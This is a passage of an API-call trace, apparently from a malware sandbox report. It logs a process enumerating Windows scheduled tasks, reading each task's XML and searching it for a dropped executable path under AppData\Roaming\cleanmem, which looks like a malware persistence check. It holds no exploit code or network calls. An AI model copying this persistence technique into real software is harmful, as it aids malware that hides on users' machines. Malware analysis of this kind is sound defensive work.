This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0229.401] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.401] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.401] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.401] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.401] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0229.403] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.403] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297060) returned 0x0 [0229.403] IRegisteredTask:get_Name (in: This=0x297060, pName=0x12dea0 | out: pName=0x12dea0*="MsCtfMonitor") returned 0x0 [0229.403] IRegisteredTask:get_Xml (in: This=0x297060, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n") returned 0x0 [0229.405] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.428] IUnknown:Release (This=0x297060) returned 0x0 [0229.428] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.428] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0229.430] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.430] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.430] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.430] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.430] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0229.432] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.432] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297050) returned 0x0 [0229.432] IRegisteredTask:get_Name (in: This=0x297050, pName=0x12dea0 | out: pName=0x12dea0*="SynchronizeTime") returned 0x0 [0229.432] IRegisteredTask:get_Xml (in: This=0x297050, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0229.434] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.468] IUnknown:Release (This=0x297050) returned 0x0 [0229.468] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.468] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0229.469] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.469] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.469] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.469] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.469] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0229.471] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.471] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297010) returned 0x0 [0229.471] IRegisteredTask:get_Name (in: This=0x297010, pName=0x12dea0 | out: pName=0x12dea0*="UPnPHostConfig") returned 0x0 [0229.471] IRegisteredTask:get_Xml (in: This=0x297010, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0229.472] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.486] IUnknown:Release (This=0x297010) returned 0x0 [0229.486] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.486] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0229.487] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.487] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.487] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.487] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.487] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0229.489] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.489] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297050) returned 0x0 [0229.489] IRegisteredTask:get_Name (in: This=0x297050, pName=0x12dea0 | out: pName=0x12dea0*="HiveUploadTask") returned 0x0 [0229.489] IRegisteredTask:get_Xml (in: This=0x297050, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0229.491] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.517] IUnknown:Release (This=0x297050) returned 0x0 [0229.517] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.517] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0229.518] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.518] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.518] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.518] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.518] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0229.519] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.519] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297010) returned 0x0 [0229.519] IRegisteredTask:get_Name (in: This=0x297010, pName=0x12dea0 | out: pName=0x12dea0*="ResolutionHost") returned 0x0 [0229.519] IRegisteredTask:get_Xml (in: This=0x297010, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n") returned 0x0 [0229.521] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.542] IUnknown:Release (This=0x297010) returned 0x0 [0229.542] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.542] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0229.543] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.543] IUnknown:Release (This=0x296ed0) returned 0x0 [0229.543] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.543] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.543] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0229.545] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.545] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297060) returned 0x0 [0229.545] IRegisteredTask:get_Name (in: This=0x297060, pName=0x12dea0 | out: pName=0x12dea0*="QueueReporting") returned 0x0 [0229.545] IRegisteredTask:get_Xml (in: This=0x297060, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n") returned 0x0 [0229.546] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.570] IUnknown:Release (This=0x297060) returned 0x0 [0229.570] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.570] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0229.571] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.571] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.571] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.571] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.571] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f00) returned 0x0 [0229.572] IRegisteredTaskCollection:get_Count (in: This=0x296f00, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.572] IRegisteredTaskCollection:get_Item (in: This=0x296f00, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297070) returned 0x0 [0229.573] IRegisteredTask:get_Name (in: This=0x297070, pName=0x12dea0 | out: pName=0x12dea0*="BfeOnServiceStartTypeChange") returned 0x0 [0229.573] IRegisteredTask:get_Xml (in: This=0x297070, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0229.574] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.600] IUnknown:Release (This=0x297070) returned 0x0 [0229.600] IUnknown:Release (This=0x296f00) returned 0x0 [0229.600] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f00) returned 0x0 [0229.601] ITaskFolderCollection:get_Count (in: This=0x296f00, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.601] IUnknown:Release (This=0x296f00) returned 0x0 [0229.601] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.601] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.601] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0229.602] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.602] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297060) returned 0x0 [0229.602] IRegisteredTask:get_Name (in: This=0x297060, pName=0x12dea0 | out: pName=0x12dea0*="UpdateLibrary") returned 0x0 [0229.602] IRegisteredTask:get_Xml (in: This=0x297060, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n") returned 0x0 [0229.604] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.632] IUnknown:Release (This=0x297060) returned 0x0 [0229.632] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.632] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0229.633] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.633] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.633] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.633] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.633] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0229.635] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.635] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0229.635] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="ConfigNotification") returned 0x0 [0229.635] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n") returned 0x0 [0229.637] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.670] IUnknown:Release (This=0x297040) returned 0x0 [0229.670] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.670] ITaskFolder:GetFolders (in: 